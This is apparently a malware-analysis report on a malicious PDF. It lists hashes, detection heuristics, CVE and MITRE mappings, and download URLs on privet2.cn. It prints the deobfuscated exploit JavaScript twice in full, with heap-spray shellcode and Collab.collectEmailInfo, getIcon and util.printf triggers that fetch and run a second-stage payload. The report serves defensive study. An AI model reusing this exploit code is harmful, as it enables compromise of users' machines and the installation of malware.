Malicious PDF — malware analysis report

Static analysis result for SHA-256 7debee6884a8e2e6…

MALICIOUS

PDF

6.7 KB First seen: 2026-05-08
MD5: 8c53fcb62096e559ede96d80d04e238f SHA-1: a435098eea1b37ae084bb4af7291cef41857d13c SHA-256: 7debee6884a8e2e628023adc889c7af5c05b1678fd7f1a0e1f4bdffc37e492a7
308 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits CVE-2007-5659 using the Collab.collectEmailInfo function. This script is designed to download and execute a second-stage payload from URLs hosted on 'privet2.cn'. The JavaScript is obfuscated but the deobfuscated version clearly shows the intent to fetch and run external code.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
         var zvy3m2MDHA76kpApAr = 0x0c0c0c0c;
     var oAYTPr5rwUCCm19l3v =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8 …
   }
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://privet2.cn/arend_nt/getexe.php?spl=pdf_email Referenced by PDF JavaScript
    • http://privet2.cn/arend_nt/getexe.php?spl=pdf_prntfReferenced by PDF JavaScript
    • http://privet2.cn/arend_nt/getexe.php?spl=pdf_icnReferenced by PDF JavaScript
    • http://privet2.cn/arend_nt/getexeReferenced by PDF JavaScript

Related samples 8

Ranked by shared artifacts, heuristics, extracted URLs, CVEs, and signatures.

Full JSON: related samples API

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js pdf-javascript-stream PDF /JS object 9 at offset 0xD6 5887 bytes
SHA-256: 4a9a5d2932e023916e3450c1b0577863b334fa4f3a4ce54827de2cb3a5d4a182
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 eval/decoder/string-building token(s). 22 of 42 identifiers look randomly generated (e.g. 'if8o2Zc7L7zIMfrXVb') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var WaFvHDXtCiE1VXxTMP = new Array();
 var IbrD4caEdMYpgCPw9h;
 var lave = eval;
 function KfaLOoMtMJMjjnKa1N(KbcpyAfeN6bVmkBN7Z, oSSYmpHVdb6dzIFc9D)
 {
   while(KbcpyAfeN6bVmkBN7Z.length * 2 < oSSYmpHVdb6dzIFc9D)
   {
     KbcpyAfeN6bVmkBN7Z += KbcpyAfeN6bVmkBN7Z;
   }
   KbcpyAfeN6bVmkBN7Z = KbcpyAfeN6bVmkBN7Z.substring(0, oSSYmpHVdb6dzIFc9D / 2);
   return KbcpyAfeN6bVmkBN7Z;
 }
 function lnsAtTffEr4KQFntnZ(p66LhAzgTEIbS6PKGI)
 {
   if(p66LhAzgTEIbS6PKGI == 0)
   {
     var zvy3m2MDHA76kpApAr = 0x0c0c0c0c;
     var oAYTPr5rwUCCm19l3v =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6D65%u6961%u006C");
   }
   else if(p66LhAzgTEIbS6PKGI == 1)
   {
     zvy3m2MDHA76kpApAr = 0x30303030;
     var oAYTPr5rwUCCm19l3v =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7270%u746E%u0066");
   }
   else if(p66LhAzgTEIbS6PKGI == 2)
   {
     var oAYTPr5rwUCCm19l3v =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6369%u006E");
   }
   var eP04aF0K6J0GB0Qjcq = 0x400000;
   var LhhXBukxutixpVMyZw = oAYTPr5rwUCCm19l3v.length * 2;
   var oSSYmpHVdb6dzIFc9D = eP04aF0K6J0GB0Qjcq - (LhhXBukxutixpVMyZw + 0x38);
   var KbcpyAfeN6bVmkBN7Z = unescape("%u9090%u9090");
   KbcpyAfeN6bVmkBN7Z = KfaLOoMtMJMjjnKa1N(KbcpyAfeN6bVmkBN7Z, oSSYmpHVdb6dzIFc9D);
   var XiHJ3QZDZ1wCqXtY55 = (zvy3m2MDHA76kpApAr - 0x400000) / eP04aF0K6J0GB0Qjcq;
   for(var Sp3MilKXHhVrekav4c = 0; Sp3MilKXHhVrekav4c < XiHJ3QZDZ1wCqXtY55; Sp3MilKXHhVrekav4c++)
   {
     WaFvHDXtCiE1VXxTMP[Sp3MilKXHhVrekav4c] = KbcpyAfeN6bVmkBN7Z + oAYTPr5rwUCCm19l3v;
   }
 }
 function wcpvcm9SK21P7SE0px()
 {
   var u0UDr15VkeQoHmQ8i4 = 0;
   var QqVDsWczzr9po5zJHq = app.viewerVersion.toString();
   app.clearTimeOut(IbrD4caEdMYpgCPw9h);
   if((QqVDsWczzr9po5zJHq >= 8 && QqVDsWczzr9po5zJHq < 8.102) || QqVDsWczzr9po5zJHq < 7.1)
   {
     lnsAtTffEr4KQFntnZ(0);
     var VML52lsIYJPGMJ7sXz = unescape("%u0c0c%u0c0c");
     while(VML52lsIYJPGMJ7sXz.length < 44952) VML52lsIYJPGMJ7sXz += VML52lsIYJPGMJ7sXz;
     var K0yO28EpBD9T5SqQXr = this;
     var KQ0kjZ16s8yP7NZ5ma = Collab;
     K0yO28EpBD9T5SqQXr["collabStore"] = KQ0kjZ16s8yP7NZ5ma["collectEmailInfo"](
     {
       subj : "", msg : VML52lsIYJPGMJ7sXz
     }
     );
   }
   if((QqVDsWczzr9po5zJHq >= 8.102 && QqVDsWczzr9po5zJHq < 8.104) || (QqVDsWczzr9po5zJHq >= 9 && QqVDsWczzr9po5zJHq < 9.1) || QqVDsWczzr9po5zJHq <= 7.101)
   {
     try
     {
       if(app.doc.Collab.getIcon)
       {
         lnsAtTffEr4KQFntnZ(2);
         var Q1QOEZrJ2ijZZuzjfi = unescape("%09");
         while(Q1QOEZrJ2ijZZuzjfi.length < 0x4000)
         {
           Q1QOEZrJ2ijZZuzjfi += Q1QOEZrJ2ijZZuzjfi;
         }
         Q1QOEZrJ2ijZZuzjfi = "N." + Q1QOEZrJ2ijZZuzjfi;
         var ofoBmmbtABywmAxCYB = app;
         ofoBmmbtABywmAxCYB["doc"]["Collab"]["getIcon"](Q1QOEZrJ2ijZZuzjfi);
         u0UDr15VkeQoHmQ8i4 = 1;
       }
       else
       {
         u0UDr15VkeQoHmQ8i4 = 1;
       }
     }
     catch(e)
     {
       u0UDr15VkeQoHmQ8i4 = 1;
     }
     if(u0UDr15VkeQoHmQ8i4 == 1)
     {
       if(QqVDsWczzr9po5zJHq == 8.102 || QqVDsWczzr9po5zJHq == 7.1)
       {
         lnsAtTffEr4KQFntnZ(1);
         var jQUn9EMi0MSo5lTtxG = "12999999999999999999";
         for(iYAqk9mWIkiqwUGRIP = 0; iYAqk9mWIkiqwUGRIP < 276; iYAqk9mWIkiqwUGRIP++)
         {
           jQUn9EMi0MSo5lTtxG += "8";
         }
         var if8o2Zc7L7zIMfrXVb = util;
         if8o2Zc7L7zIMfrXVb["printf"]("%45000f", jQUn9EMi0MSo5lTtxG);
       }
     }
   }
}
 app.KI8x3qozL6QdU6JctK = wcpvcm9SK21P7SE0px;
 IbrD4caEdMYpgCPw9h = app.setTimeOut("app.KI8x3qozL6QdU6JctK()", 1);
javascript_obj0009_000_shellcode_00.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 9 at offset 0xD6 276 bytes
SHA-256: 53b3e4c7a38345353f3fa1ae4b7ff52d402e922a3c928c5080347dbe2dec1883
javascript_obj0009_000_shellcode_01.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 9 at offset 0xD6 276 bytes
SHA-256: d3ec852c1d2decd4c16deaf172efa38de6b4ff01d8134aa8e996f13f2df4eb41
javascript_obj0009_000_shellcode_02.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 9 at offset 0xD6 274 bytes
SHA-256: 12ed26cd8dd7e85424451cd7e17e925b4b010481b1a4fd61291904ff3ca0143d
generic_stage_recovery_000.js deobfuscated-js generic stage recovery percent-decode from JavaScript object 9 at offset 0xD6 5883 bytes
SHA-256: 5edc4edcc4876c420ed4928d8fe2b6498bb269bcc41517b148eb0b0af6b3f735
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 eval/decoder/string-building token(s). 22 of 42 identifiers look randomly generated (e.g. 'if8o2Zc7L7zIMfrXVb') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var WaFvHDXtCiE1VXxTMP = new Array();
 var IbrD4caEdMYpgCPw9h;
 var lave = eval;
 function KfaLOoMtMJMjjnKa1N(KbcpyAfeN6bVmkBN7Z, oSSYmpHVdb6dzIFc9D)
 {
   while(KbcpyAfeN6bVmkBN7Z.length * 2 < oSSYmpHVdb6dzIFc9D)
   {
     KbcpyAfeN6bVmkBN7Z += KbcpyAfeN6bVmkBN7Z;
   }
   KbcpyAfeN6bVmkBN7Z = KbcpyAfeN6bVmkBN7Z.substring(0, oSSYmpHVdb6dzIFc9D / 2);
   return KbcpyAfeN6bVmkBN7Z;
 }
 function lnsAtTffEr4KQFntnZ(p66LhAzgTEIbS6PKGI)
 {
   if(p66LhAzgTEIbS6PKGI == 0)
   {
     var zvy3m2MDHA76kpApAr = 0x0c0c0c0c;
     var oAYTPr5rwUCCm19l3v =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6D65%u6961%u006C");
   }
   else if(p66LhAzgTEIbS6PKGI == 1)
   {
     zvy3m2MDHA76kpApAr = 0x30303030;
     var oAYTPr5rwUCCm19l3v =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7270%u746E%u0066");
   }
   else if(p66LhAzgTEIbS6PKGI == 2)
   {
     var oAYTPr5rwUCCm19l3v =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6369%u006E");
   }
   var eP04aF0K6J0GB0Qjcq = 0x400000;
   var LhhXBukxutixpVMyZw = oAYTPr5rwUCCm19l3v.length * 2;
   var oSSYmpHVdb6dzIFc9D = eP04aF0K6J0GB0Qjcq - (LhhXBukxutixpVMyZw + 0x38);
   var KbcpyAfeN6bVmkBN7Z = unescape("%u9090%u9090");
   KbcpyAfeN6bVmkBN7Z = KfaLOoMtMJMjjnKa1N(KbcpyAfeN6bVmkBN7Z, oSSYmpHVdb6dzIFc9D);
   var XiHJ3QZDZ1wCqXtY55 = (zvy3m2MDHA76kpApAr - 0x400000) / eP04aF0K6J0GB0Qjcq;
   for(var Sp3MilKXHhVrekav4c = 0; Sp3MilKXHhVrekav4c < XiHJ3QZDZ1wCqXtY55; Sp3MilKXHhVrekav4c++)
   {
     WaFvHDXtCiE1VXxTMP[Sp3MilKXHhVrekav4c] = KbcpyAfeN6bVmkBN7Z + oAYTPr5rwUCCm19l3v;
   }
 }
 function wcpvcm9SK21P7SE0px()
 {
   var u0UDr15VkeQoHmQ8i4 = 0;
   var QqVDsWczzr9po5zJHq = app.viewerVersion.toString();
   app.clearTimeOut(IbrD4caEdMYpgCPw9h);
   if((QqVDsWczzr9po5zJHq >= 8 && QqVDsWczzr9po5zJHq < 8.102) || QqVDsWczzr9po5zJHq < 7.1)
   {
     lnsAtTffEr4KQFntnZ(0);
     var VML52lsIYJPGMJ7sXz = unescape("%u0c0c%u0c0c");
     while(VML52lsIYJPGMJ7sXz.length < 44952) VML52lsIYJPGMJ7sXz += VML52lsIYJPGMJ7sXz;
     var K0yO28EpBD9T5SqQXr = this;
     var KQ0kjZ16s8yP7NZ5ma = Collab;
     K0yO28EpBD9T5SqQXr["collabStore"] = KQ0kjZ16s8yP7NZ5ma["collectEmailInfo"](
     {
       subj : "", msg : VML52lsIYJPGMJ7sXz
     }
     );
   }
   if((QqVDsWczzr9po5zJHq >= 8.102 && QqVDsWczzr9po5zJHq < 8.104) || (QqVDsWczzr9po5zJHq >= 9 && QqVDsWczzr9po5zJHq < 9.1) || QqVDsWczzr9po5zJHq <= 7.101)
   {
     try
     {
       if(app.doc.Collab.getIcon)
       {
         lnsAtTffEr4KQFntnZ(2);
         var Q1QOEZrJ2ijZZuzjfi = unescape("	");
         while(Q1QOEZrJ2ijZZuzjfi.length < 0x4000)
         {
           Q1QOEZrJ2ijZZuzjfi += Q1QOEZrJ2ijZZuzjfi;
         }
         Q1QOEZrJ2ijZZuzjfi = "N." + Q1QOEZrJ2ijZZuzjfi;
         var ofoBmmbtABywmAxCYB = app;
         ofoBmmbtABywmAxCYB["doc"]["Collab"]["getIcon"](Q1QOEZrJ2ijZZuzjfi);
         u0UDr15VkeQoHmQ8i4 = 1;
       }
       else
       {
         u0UDr15VkeQoHmQ8i4 = 1;
       }
     }
     catch(e)
     {
       u0UDr15VkeQoHmQ8i4 = 1;
     }
     if(u0UDr15VkeQoHmQ8i4 == 1)
     {
       if(QqVDsWczzr9po5zJHq == 8.102 || QqVDsWczzr9po5zJHq == 7.1)
       {
         lnsAtTffEr4KQFntnZ(1);
         var jQUn9EMi0MSo5lTtxG = "12999999999999999999";
         for(iYAqk9mWIkiqwUGRIP = 0; iYAqk9mWIkiqwUGRIP < 276; iYAqk9mWIkiqwUGRIP++)
         {
           jQUn9EMi0MSo5lTtxG += "8";
         }
         var if8o2Zc7L7zIMfrXVb = util;
         if8o2Zc7L7zIMfrXVb["printf"]("E000f", jQUn9EMi0MSo5lTtxG);
       }
     }
   }
}
 app.KI8x3qozL6QdU6JctK = wcpvcm9SK21P7SE0px;
 IbrD4caEdMYpgCPw9h = app.setTimeOut("app.KI8x3qozL6QdU6JctK()", 1);

Open this report in the interactive analyzer, or submit your own file for analysis.